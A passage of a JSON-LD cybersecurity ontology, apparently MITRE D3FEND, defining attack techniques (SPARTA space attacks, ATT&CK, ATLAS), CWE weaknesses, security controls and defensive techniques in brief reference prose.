      "d3f:definition": "In a terrestrial environment, threat actors use traffic analysis attacks to analyze traffic flow to gather topological information. This traffic flow can divulge information about critical nodes, such as the aggregator node in a sensor network. In the space environment, specifically with relays and constellations, traffic analysis can be used to understand the energy capacity of a spacecraft node and the fact that the transceiver component of a spacecraft node consumes the most power. The spacecraft nodes in a constellation network limit the use of the transceiver to transmit or receive information either at a regulated time interval or only when an event has been detected. This generally results in an architecture comprising some aggregator spacecraft nodes within a constellation network. These spacecraft aggregator nodes are the sensor nodes whose primary purpose is to relay transmissions from nodes toward the ground station in an efficient manner, instead of monitoring events like a normal node. The added functionality of acting as a hub for information gathering and preprocessing before relaying makes aggregator nodes an attractive target for side channel attacks. A possible side channel attack could be as simple as monitoring the occurrences and duration of computing activities at an aggregator node. If a node is frequently in active states (instead of idle states), there is a high probability that the node is an aggregator node and also there is a high probability that the communication with the node is valid. Such leakage of information is highly undesirable because the leaked information could be strategically used by threat actors in the accumulation phase of an attack.",
      "rdfs:label": "Traffic Analysis Attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Traffic Analysis Attacks"
    },
    {
      "@id": "d3f:AsymmetricFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AFTL",
      "d3f:definition": "Homogeneous (where the metrics are the same for both source and target) asymmetric transformation mapping transforms the source feature space to align with that of the target or the target to that of the source. This, in effect, bridges the feature space gap and reduces the problem into a homogeneous transfer problem when further distribution differences need to be corrected.",
      "d3f:kb-article": "## References\nDay, O., & Khoshgoftaar, T.M. (2017). A survey on heterogeneous transfer learning. Journal of Big Data, 4(1), 29. [Link](https://doi.org/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Asymmetric Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HomogenousTransferLearning"
      }
    },
    {
      "@id": "d3f:CWE-1101",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1101",
      "d3f:definition": "The product uses automatically-generated code that cannot be executed without a specific runtime support component.",
      "rdfs:label": "Reliance on Runtime Component in Generated Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:MSGEmailFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Email"
      ],
      "rdfs:label": "MSG Email File"
    },
    {
      "@id": "d3f:CWE-1261",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1261",
      "d3f:definition": "The hardware logic does not effectively handle when single-event upsets (SEUs) occur.",
      "rdfs:label": "Improper Handling of Single Event Upsets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:AuthenticateUser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Authenticate User",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N4f48663192e84f97b7fb27d787fcf5a4"
        }
      ]
    },
    {
      "@id": "_:N4f48663192e84f97b7fb27d787fcf5a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CCI-001086_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system isolates security functions enforcing access and information flow control from both nonsecurity functions and from other security functions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001086"
    },
    {
      "@id": "d3f:ATTACKICSImpairProcessControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to manipulate, disable, or damage physical control processes.",
      "d3f:enables": {
        "@id": "d3f:TA0106"
      },
      "rdfs:label": "Impair Process Control Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:N97e7e1535af44a158047d1581d9d433b"
        }
      ],
      "skos:prefLabel": "Impair Process Control Technique"
    },
    {
      "@id": "_:N97e7e1535af44a158047d1581d9d433b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0106"
      }
    },
    {
      "@id": "d3f:CCI-001494_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit tools from unauthorized modification.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-29T00:00:00"
      },
      "rdfs:label": "CCI-001494"
    },
    {
      "@id": "d3f:CWE-770",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-770",
      "d3f:definition": "The product allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on the size or number of resources that can be allocated, in violation of the intended security policy for that actor.",
      "rdfs:label": "Allocation of Resources Without Limits or Throttling",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-400"
        },
        {
          "@id": "d3f:CWE-665"
        }
      ]
    },
    {
      "@id": "d3f:ApplicationConfigurationFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:definition": "A file containing information used to configure the parameters and initial settings for an application. A plist file is an example of this type of file for macOS. Usually text-based.",
      "rdfs:label": "Application Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "_:N4cc4275b98e0450a9e5ea774478dc0fd"
        }
      ]
    },
    {
      "@id": "_:N4cc4275b98e0450a9e5ea774478dc0fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_CM-5_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Restrictions for Change | Limit Library Privileges",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "CM-5(6)"
    },
    {
      "@id": "d3f:CWE-335",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-335",
      "d3f:definition": "The product uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds.",
      "rdfs:label": "Incorrect Usage of Seeds in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:T1141",
      "@type": "owl:Class",
      "d3f:attack-id": "T1141",
      "d3f:definition": "When programs are executed that need more privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1056.002",
      "rdfs:label": "Input Prompt",
      "rdfs:seeAlso": {
        "@id": "d3f:T1056.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:AnalyticTechnique",
      "@type": "owl:Class",
      "d3f:definition": "A process in which a computer examines information using mathematical methods in order to find useful patterns.",
      "rdfs:isDefinedBy": {
        "@id": "https://dictionary.cambridge.org/us/dictionary/english/analytics"
      },
      "rdfs:label": "Analytic Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:Technique"
      }
    },
    {
      "@id": "d3f:CWE-170",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-170",
      "d3f:definition": "The product does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.",
      "rdfs:label": "Improper Null Termination",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-707"
      }
    },
    {
      "@id": "d3f:OperatingModeRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperatingModeRestriction"
      ],
      "d3f:d3fend-id": "D3-OPR",
      "d3f:definition": "Restricting unauthorized changes to the operating mode prevents devices from switching into inappropriate or vulnerable states during normal use.",
      "d3f:kb-article": "## How it works\nMany OT Controllers use key switches to change the controller into different modes of operation. These modes of operation can include Program, Run, Remote, or Stop.\n\nThe key switch should be left in the appropriate key switch position, e.g., run or remote during normal operations.\n\nImplement a key management procedure to include removing the physical key from the key switch when not in use.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MITREATTACKAuthorizationEnforcement"
        },
        {
          "@id": "d3f:Reference-TRITONMalwareRemainsThreattoGlobalCriticalInfrastructureICS"
        }
      ],
      "d3f:restricts": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:label": "Operating Mode Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:Na669243fc6014072b0f3a165a45d512e"
        }
      ]
    },
    {
      "@id": "_:Na669243fc6014072b0f3a165a45d512e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:Reference-Network-levelPolymorphicShellcodeDetectionUsingEmulation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.cs.unc.edu/~fabian/course_papers/polymorphic-detect.pdf"
      },
      "d3f:kb-author": "Michalis Polychronakis",
      "d3f:kb-reference-of": {
        "@id": "d3f:ByteSequenceEmulation"
      },
      "d3f:kb-reference-title": "Network-level polymorphic shellcode detection using emulation",
      "rdfs:label": "Reference - Network-level polymorphic shellcode detection using emulation"
    },
    {
      "@id": "d3f:CWE-190",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-190",
      "d3f:definition": "The product performs a calculation that can produce an integer overflow or wraparound when the logic assumes that the resulting value will always be larger than the original value. This occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may become a very small or negative number.",
      "d3f:synonym": [
        "Overflow",
        "Wraparound",
        "wrap, wrap-around, wrap around"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:MathematicalFunction"
      },
      "rdfs:label": "Integer Overflow or Wraparound",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-682"
        },
        {
          "@id": "_:Nce1716b05f1e487b8cc028d3881805aa"
        }
      ]
    },
    {
      "@id": "_:Nce1716b05f1e487b8cc028d3881805aa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MathematicalFunction"
      }
    },
    {
      "@id": "d3f:Reference-SMBEventsMonitoring_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-01-003/"
      },
      "d3f:kb-abstract": "Server Message Block (SMB) is used by Windows to allow for file, pipe, and printer sharing over port 445/tcp. It allows for enumerating, and reading from and writing to file shares for a remote computer. Although it is heavily used by Windows servers for legitimate purposes and by users for file and printer sharing, many adversaries also use SMB to achieve Lateral Movement. Looking at this activity more closely to obtain an adequate sense of situational awareness may make it possible to detect adversaries moving between hosts in a way that deviates from normal activity. Because SMB traffic is heavy in many environments, this analytic may be difficult to turn into something that can be used to quickly detect an APT. In some cases, it may make more sense to run this analytic in a forensic fashion. Looking through and filtering its output after an intrusion has been discovered may be helpful in identifying the scope of compromise.\n\nOutput Description:\nThe source, destination, content, and time of each event.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-01-003: SMB Events Monitoring",
      "rdfs:label": "Reference - CAR-2013-01-003: SMB Events Monitoring - MITRE"
    },
    {
      "@id": "d3f:ScheduledJobDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a scheduled task is deactivated, preventing further execution until re-enabled.",
      "rdfs:label": "Scheduled Job Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N097b34f3186a42fa96cfa2f7b54f5767"
        }
      ]
    },
    {
      "@id": "_:N097b34f3186a42fa96cfa2f7b54f5767",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobEnableEvent"
      }
    },
    {
      "@id": "d3f:CWE-601",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-601",
      "d3f:definition": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.",
      "d3f:synonym": [
        "Cross-domain Redirect",
        "Cross-site Redirect",
        "Open Redirect",
        "Unvalidated Redirect"
      ],
      "rdfs:label": "URL Redirection to Untrusted Site ('Open Redirect')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-610"
      }
    },
    {
      "@id": "d3f:REC-0003.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0003.02",
      "d3f:definition": "Threat actors study how commands are formed, authorized, scheduled, and delivered. High-value details include the telecommand protocol (e.g., CCSDS TC), framing and CRC/MAC fields, authentication scheme (keys, counters, anti-replay windows), command dictionary/database formats, critical-command interlocks and enable codes, rate and size limits, timetag handling, command queue semantics, and the roles of scripts or procedures that batch actions. They also collect rules governing “valid commanding periods”: line-of-sight windows, station handovers, maintenance modes, safing states, timeouts, and when rapid-response commanding is permitted. With this, an adversary can craft syntactically valid traffic, time injections to coincide with reduced monitoring, or induce desynchronization (e.g., counter resets, stale timetags).",
      "rdfs:label": "Commanding Details - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0003/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0003"
      },
      "skos:prefLabel": "Commanding Details"
    },
    {
      "@id": "d3f:controlled-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x controlled-by y: x's operation or behavior is directed or regulated by y.",
      "owl:inverseOf": {
        "@id": "d3f:controls"
      },
      "rdfs:label": "controlled-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:GatedRecurrentUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-GRU",
      "d3f:definition": "The GRU is like a long short-term memory (LSTM) with a forget gate, but has fewer parameters than LSTM, as it lacks an output gate. GRU's performance on certain tasks of polyphonic music modeling, speech signal modeling and natural language processing was found to be similar to that of LSTM.",
      "d3f:kb-article": "## References\nWikipedia. (2021, September 20). Gated Recurrent Unit. [Link](https://en.wikipedia.org/wiki/Gated_recurrent_unit)",
      "rdfs:label": "Gated Recurrent Unit",
      "rdfs:subClassOf": {
        "@id": "d3f:RecurrentNeuralNetwork"
      }
    },
    {
      "@id": "d3f:CredentialManagementSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Credential Management, also referred to as a Credential Management System (CMS), is an established form of software that is used for issuing and managing credentials as part of public key infrastructure (PKI).",
      "d3f:manages": {
        "@id": "d3f:Credential"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Credential_Management"
      },
      "rdfs:label": "Credential Management System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N485d5ba5c86649cba8a65dddd3e11e78"
        }
      ]
    },
    {
      "@id": "_:N485d5ba5c86649cba8a65dddd3e11e78",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ProcessTerminationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the cessation of a process, including resource deallocation and cleanup, either due to normal completion or abnormal termination.",
      "rdfs:label": "Process Termination Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N5c99d0feb54a4eeeb86a5335a157ddcd"
        }
      ]
    },
    {
      "@id": "_:N5c99d0feb54a4eeeb86a5335a157ddcd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCreationEvent"
      }
    },
    {
      "@id": "d3f:DetectionEvent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An event capturing the identification of a potential security issue, such as unauthorized access attempts, policy violations, or anomalous activities. Detection events form the foundation of cybersecurity monitoring and response.",
      "d3f:related": {
        "@id": "d3f:Detect"
      },
      "rdfs:label": "Detection Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/categories/findings"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SecurityEvent"
      }
    },
    {
      "@id": "d3f:PhysicalEnclosureHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalEnclosureHardening"
      ],
      "d3f:d3fend-id": "D3-PEH",
      "d3f:definition": "Physical changes to a computer enclosure which reduce the ability of agents or the environment to affect the contained computer system.",
      "d3f:hardens": {
        "@id": "d3f:ComputerEnclosure"
      },
      "d3f:kb-article": "## How it works\n\nSystem designers or operators make physical changes to a computer enclosure which reduce the ability of agents or the environment to affect the contained computer system. These additions to the enclosure may be of various materials to reduce the effects of heat, gases, vibration, or agent access.\n\n## Considerations\n\n* Use asset inventory tools to track physical equipment and monitor both people and devices for access control.\n* Consider relevant regulations to ensure enclosures are in compliance.\n* Properly hardened enclosures should be installed and maintained to ensure they are operable and free of tampering. Access to these enclosures is controlled through physical barriers, such as locks and bolts, and may include tamper-evident hardware.\n* Records should be maintained concerning maintenance performed, access, and any possible tampering marks or associated incidents.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        }
      ],
      "rdfs:label": "Physical Enclosure Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N8d00f7ff548743ebbc5e99ecb6a92fe0"
        }
      ]
    },
    {
      "@id": "_:N8d00f7ff548743ebbc5e99ecb6a92fe0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:SystemFileAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemFileAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:d3fend-id": "D3-SFA",
      "d3f:definition": "Monitoring system files such as authentication databases, configuration files, system logs, and system executables for modification or tampering.",
      "d3f:kb-article": "## How it works\nThis technique monitors the integrity of system-owned file resources. System files can impact the behavior below the user level.\n\n## Considerations\n* The size of log file analysis needs to be managed.\n* False positives are a concern with this technique and filtering will need to be given additional thought.\n* A baseline or snapshot of file checksums should be established for future comparison.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AccessPermissionModification_MITRE"
        },
        {
          "@id": "d3f:Reference-AutorunDifferences_MITRE"
        },
        {
          "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE"
        }
      ],
      "rdfs:label": "System File Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N896204c6261b40a5a12803d47d18eec8"
        }
      ]
    },
    {
      "@id": "_:N896204c6261b40a5a12803d47d18eec8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:CWE-181",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-181",
      "d3f:definition": "The product validates data before it has been filtered, which prevents the product from detecting data that becomes invalid after the filtering step.",
      "d3f:synonym": "Validate-before-cleanse",
      "rdfs:label": "Incorrect Behavior Order: Validate Before Filter",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-179"
      }
    },
    {
      "@id": "d3f:PermissionGrantingEvent",
      "@type": "owl:Class",
      "d3f:definition": "An administrative event where authorization is given, allowing a subject to perform specific operations on a protected resource, effectuating a policy decision to allow access rights.",
      "rdfs:label": "Permission Granting Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/user_access"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AccessControlAdministrationEvent"
      }
    },
    {
      "@id": "d3f:T1576",
      "@type": "owl:Class",
      "d3f:attack-id": "T1576",
      "d3f:definition": "Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1630.001",
      "rdfs:label": "Uninstall Malicious Application - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1630.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Uninstall Malicious Application"
    },
    {
      "@id": "d3f:EXF-0002.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0002.05",
      "d3f:definition": "Threat actors can leverage thermal imaging attacks (e.g., infrared images) to measure heat that is emitted as a means to exfiltrate information from spacecraft processors. Thermal attacks rely on temperature profiling using sensors to extract critical information from the chip(s). The availability of highly sensitive thermal sensors, infrared cameras, and techniques to calculate power consumption from temperature distribution [7] has enhanced the effectiveness of these attacks. As a result, side-channel attacks can be performed by using temperature data without measuring power pins of the chip.",
      "rdfs:label": "Thermal Imaging attacks - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0002/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0002"
      },
      "skos:prefLabel": "Thermal Imaging attacks"
    },
    {
      "@id": "d3f:T1544",
      "@type": "owl:Class",
      "d3f:attack-id": "T1544",
      "d3f:definition": "Adversaries may transfer tools or other files from an external system onto a compromised device to facilitate follow-on actions. Files may be copied from an external adversary-controlled system through the command and control channel or through alternate protocols with another tool such as FTP.",
      "rdfs:label": "Ingress Tool Transfer - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Ingress Tool Transfer"
    },
    {
      "@id": "d3f:TemporalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-TL",
      "d3f:definition": "Temporal logic addresses the semantics of tense; i.e., qualifying expressions of when.",
      "d3f:kb-article": "## References\n1. Temporal logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Temporal_logic)",
      "rdfs:label": "Temporal Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:IA-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0004",
      "d3f:definition": "Adversaries pursue alternative paths to the spacecraft that differ from the primary TT&C in configuration, monitoring, or authentication. Examples include backup MOC/ground networks, contingency TT&C chains, maintenance or recovery consoles, low-rate emergency beacons, and secondary receivers or antennas on the vehicle. These channels exist to preserve commandability during outages, safing, or maintenance; they may use different vendors, legacy settings, or simplified procedures. Initial access typically pairs reconnaissance of failover rules with actions that steer operations onto the backup path, natural events, induced denial on the primary, or simple patience until scheduled tests and handovers occur. Once traffic flows over the alternate path, the attacker leverages its distinct procedures, dictionaries, or rate/size limits to introduce commands or data that would be harder to inject on the primary.",
      "rdfs:label": "Secondary/Backup Communication Channel - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Secondary/Backup Communication Channel"
    },
    {
      "@id": "d3f:T1177",
      "@type": "owl:Class",
      "d3f:attack-id": "T1177",
      "d3f:definition": "The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.008",
      "rdfs:label": "LSASS Driver",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1590.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1590.004",
      "d3f:definition": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.",
      "rdfs:label": "Network Topology",
      "rdfs:subClassOf": {
        "@id": "d3f:T1590"
      }
    },
    {
      "@id": "d3f:CWE-547",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-547",
      "d3f:definition": "The product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change.",
      "rdfs:label": "Use of Hard-coded, Security-relevant Constants",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1078"
      }
    },
    {
      "@id": "d3f:CWE-1086",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1086",
      "d3f:definition": "A class contains an unnecessarily large number of children.",
      "rdfs:label": "Class with Excessive Number of Child Classes",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1093"
      }
    },
    {
      "@id": "d3f:CWE-827",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-827",
      "d3f:definition": "The product does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the product to expose files, consume excessive system resources, or execute arbitrary HTTP requests on behalf of the attacker.",
      "rdfs:label": "Improper Control of Document Type Definition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-706"
        },
        {
          "@id": "d3f:CWE-829"
        }
      ]
    },
    {
      "@id": "d3f:RemoteCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A remote command is an instruction or set of instructions issued from a geographically or logically distant location to control, configure, or elicit a response from a target system, device, or entity. The execution of a remote command does not require direct physical interaction with the target; instead, it relies on a communication link to transmit the instruction and receive any resulting feedback or data.",
      "rdfs:label": "Remote Command",
      "rdfs:subClassOf": {
        "@id": "d3f:Command"
      }
    },
    {
      "@id": "d3f:CWE-489",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-489",
      "d3f:definition": "The product is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.",
      "d3f:synonym": "Leftover debug code",
      "rdfs:label": "Active Debug Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:AML.T0018.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0018.002",
      "d3f:definition": "Adversaries may embed malicious code into AI Model files.\nAI models may be packaged as a combination of instructions and weights.\nSome formats such as pickle files are unsafe to deserialize because they can contain unsafe calls such as exec.\nModels with embedded malware may still operate as expected.\nEmbedding malware may allow adversaries to achieve Execution, Command & Control, or Exfiltrate Data.",
      "rdfs:label": "Embed Malware - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0018.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0018"
      },
      "skos:prefLabel": "Embed Malware"
    },
    {
      "@id": "d3f:OTProgramModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Command that places the controller in a mode capable of reprogramming logic. This may or may not stop the program.",
      "rdfs:label": "OT Program Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N51c99dd1222b49b2a2df0224e098ace0"
        },
        {
          "@id": "_:N9d4029c54bd84a67aa3c7d011777c65d"
        }
      ]
    },
    {
      "@id": "_:N51c99dd1222b49b2a2df0224e098ace0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
